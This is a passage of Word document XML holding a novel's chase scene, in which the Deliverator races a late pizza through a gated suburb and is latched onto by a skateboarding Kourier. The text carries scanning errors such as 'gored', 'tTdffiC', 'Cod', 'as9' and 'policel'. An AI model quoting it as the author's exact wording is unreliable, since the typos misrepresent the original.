            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> is pulling out of the chute, building up speed, checking the address that is flashed across his windshield, deciding whether to turn right or left, it happens. His stereo cuts out again-on command of the onboard system. The cockpit lights </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>gored</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>. Red~ A repetitive buzzer begins to sound. The LED readout on his windshield, which echoes the one on the pizza box, flashes up: 20:00.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B3B43E3" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">They have just given the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deliverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> a twenty-minute-old pizza. He checks the address; it is twelve miles away.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BA83156" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E7969DD" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deliverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> lets out an involuntary roar and puts the hammer down. His emotions tell him to go back and kill that manager, get his swords out of the trunk, dive in through the little sliding window like a ninja, track him down through the moiling chaos of the microwaved franchise and confront him in a climactic thick-crust apocalypse. But he thinks the same thing when someone cuts him off on the freeway, and he's never done it-yet.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32DF10E9" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">He can handle this. This is doable. He cranks up the orange warning lights to maximum brilliance, puts his headlights on </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>autoflash</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">. He overrides the warning buzzer, jams the stereo over to </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Taxiscan</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, which cruises all the taxi-driver frequencies listening for interesting traffic. Can't understand a flicking word. You could buy tapes, learn-while-you-drive, and learn to speak </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Taxilinga</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">. It was </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>essential,</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> to get a job in that business. They said it was based on English but not one word in a hundred was recognizable. Still, you could get an idea. If there was trouble on this road, they'd be babbling about it in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Taxilinga</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, give him some warning, let him take an alternate route so he wouldn't </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>get</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="32989B61" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">he grips the </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>wheel</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="238D9ED3" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">stuck in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tTdffiC</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="0B12BC2E" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="68C9D4AD" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">his eyes get big, he can feel the pressure driving them back into his </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>skull</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="21F0D1E2" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">or caught behind a mobile </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>home</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="2EB08732" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">his bladder is very full and deliver the </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>pizza</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="453F5691" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Oh, Cod oh, </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>God</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="29E8C481" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>late</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61C75BCF" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>22:06 hangs on the windshield, all he can see, all he can think about is 30:01.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3819F0F6" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The taxi drivers are buzzing about something. </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Taxilinga</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> is mellifluous babble with a few harsh foreign sounds, like butter spiced with broken glass. He keeps hearing "fare." They are always </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>iabbering</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> about </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>their !</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>@#$ing fares. Big deal. What hap-pens if you deliver your fare</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="563DE243" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F1DF677" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>late</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B84E9B4" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>you don't get as much of a tip? Big deal.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15067A41" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Big slowdown at the intersection of CSV-5 and Oahu Road, per usual, only way to avoid it is to cut through The Mews at Windsor Heights.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="348CDD9D" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TMAWFIs all have the same layout. When creating a new </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Burbclave</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, TMAWH Development Corporation will chop down any mountain ranges and divert the course of any mighty rivers that threaten to interrupt this street plan-ergonomically designed to encourage driving safety. A </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deliverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>can go into a Mews at Windsor Heights anywhere from Fairbanks to Yaroslavl to the Shenzhen special economic zone and find his way around.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B1EAD40" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">But once you've delivered a pie to every single house in a TMAWH a few times, you get to know its little secrets. The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deiverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> is such a man. He knows that in a standard TMAWH there is only one yard-one yard-that prevents you from driving straight in one entrance, across the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Burbclave</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, and out the other. If you are squeamish about driving on grass, it might take you ten minutes to meander through TMAWH. But if you have the bails to lay tracks across that one yard, you have a straight shot through the center.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02E9223B" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deliverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> knows that yard. He has delivered pizzas there. He has looked at it, scoped it out, memorized the location of the shed and the picnic table, can find them even in the dark-knows that if it ever came to this, a twenty-three-minute pizza, miles to go, and a slowdown at CSV-5 and Oahu-he could enter The Mews at Windsor Heights (his electronic delivery-man's visa would raise the gate automatically), scream down Heritage Boulevard, rip the turn onto Strawbridge Place (ignoring the DEAD END sign and the speed limit and the CHILDREN PLAYING ideograms that are strung so liberally throughout TMAWH), thrash the speed bumps with his mighty radials, blast up the driveway of Number 15 Strawbridge Circle, cut a hard left around the backyard shed, careen into the backyard of Number 84 Mayapple Place, avoid its picnic table (tricky), get into their driveway and out onto Mayapple, which takes him to </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Bellewoode</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> Valley Road, which runs straight to the exit of the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Burbclave</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>. TMAWH security police might be waiting for him at the exit, but</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44D2EAD4" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>13</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A87A61A" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>their STDs, Severe Tire Damage devices, only point one way- they can keep people out, but not keep them in.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70FC112E" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">This car can go </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>so !</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">@#$ing fast that if a cop took a bite of a doughnut as the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deiverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> was entering Heritage Boulevard, he probably wouldn't be able to swallow it until about the time the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deliverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> was shrieking out onto Oahu.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="112BF478" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Thunk</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">. And more red lights come up on the windshield: the perimeter security of the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deliverator's</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> vehicle has been breached.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E4E62A7" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>No. It can't be.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="002B9051" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Someone is shadowing him. Right off his left flank. A person on a skateboard, rolling down the highway right behind him, just as he is laying in his approach vectors to Heritage Boulevard.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="224C1944" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deliverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, in his distracted state, has allowed himself to get </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pooned</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">. As in harpooned. It is a big round padded electromagnet on the end of an </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>arachnofiber</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> cable. It </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>has</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> just </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>thunked</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> onto the back of the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deliverator's</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> car, and stuck. Ten feet behind him, the owner of this cursed device is surfing, taking him for a ride, skateboarding along like a water skier behind a boat.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C721521" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">In the </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>rearview</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">, flashes of orange and blue. The parasite is not just a punk out having a good time. It is a businessman making money. The orange and blue coverall, bulging all over with sintered </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>armorgel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> padding, is the uniform of a </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Kourier</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">. A </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Kourier</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> from </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>RadiKS</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, Radikal </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Kourier</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> Systems. Like a bicycle messenger, but a hundred times more irritating because they don't pedal under their own power-They just latch on and slow you down.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FA16988" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Naturally. The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deliverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> was in a hurry, flashing </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>his-lights</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">, squealing his contact patches. The fastest thing on the road. Naturally, the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Kourier</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> would choose him to latch onto.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E5A5862" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">No need to get rattled. With the shortcut through TMAWH, he will have plenty of time. He passes a slower car in the middle lane, then cuts right in front of him. The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Kourier</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> will have to </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>unpoon</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> or else be slammed sideways into the slower vehicle.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AFD5023" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Done. The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Kourier</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> isn't ten feet behind him anymore-he is right there, peering in the rear window. Anticipating the maneuver, the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Kourier</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> reeled in his cord, which is attached to a handle with a power reel in it, and is now right on top of the </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>pizza</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="22F832D2" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>14</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26C26F8B" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">mobile, the front wheel of his skateboard </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>actually underneath</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deliverator's</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> rear bumper.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C3DE564" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">An orange-and-blue-gloved hand reaches forward, a transparent sheet of plastic draped over it, and slaps his driver's side window. The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deliverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> has just been </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>stickered</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>. The sticker is a foot across and reads, in big orange block letters, printed backward so that he can read it from the inside.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D95E227" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3A11CE2E" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>THAT WAS STALE</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="581F96A6" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4EE33346" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">He almost misses the turnoff for The Mews at Windsor Heights. He </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>has to</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> jam the brakes, let traffic clear, cut across the curb lane to enter the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Burbclave</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">. The border post is well lighted, the customs agents ready to frisk all comers-cavity-search them if they are the wrong kind of people-but the gate flies open as if by magic as the security system senses that this isa </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>CosaNostra</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> Pizza vehicle, just making a delivery, sir. And as he goes through, the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Kourier</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">-that tick on his as9-waves to the border </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>policel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> What a prick! Like he comes in here all the time!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D32DD84" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">He probably does come in here all the time. Picking up </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>important !</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">@#$ for important TMAWH people, delivering it to other FOQNEs, Franchise-Organized Quasi-National Entities, getting it through customs. That's what </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Kouriers</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> do. Still.</w:t>
            </w:r>
          </w:p>
